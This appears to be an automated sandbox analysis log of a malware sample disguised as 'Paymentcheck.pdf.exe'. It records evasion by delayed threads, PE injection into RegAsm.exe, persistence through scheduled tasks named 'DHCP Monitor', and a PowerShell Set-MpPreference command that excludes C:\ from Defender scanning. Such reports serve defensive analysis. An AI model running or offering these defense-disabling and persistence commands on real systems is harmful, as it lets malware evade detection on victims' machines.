Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3Show sources
Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6860, type: MEMORYSTR
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeWindow / User API: threadDelayed 2164Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 3128Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWindow / User API: threadDelayed 6418Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 440Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe TID: 6080Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5548Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6276Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe TID: 5536Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5612Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 400000Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 402000Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 420000Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 422000Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeMemory written: C:\Users\user\AppData\Local\Temp\RegAsm.exe base: 652008Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs' Jump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'Jump to behavior
Source: RegAsm.exe, 0000000D.00000002.933131448.0000000002BB5000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progman
Source: RegAsm.exe, 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmpBinary or memory string: Program ManagerD$Rk
Source: RegAsm.exe, 0000000D.00000002.932300920.00000000029DB000.00000004.00000001.sdmpBinary or memory string: Program Managerx
Source: RegAsm.exe, 0000000D.00000002.930299942.00000000010F0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.930540540.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Users\user\Desktop\Paymentcheck.pdf.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
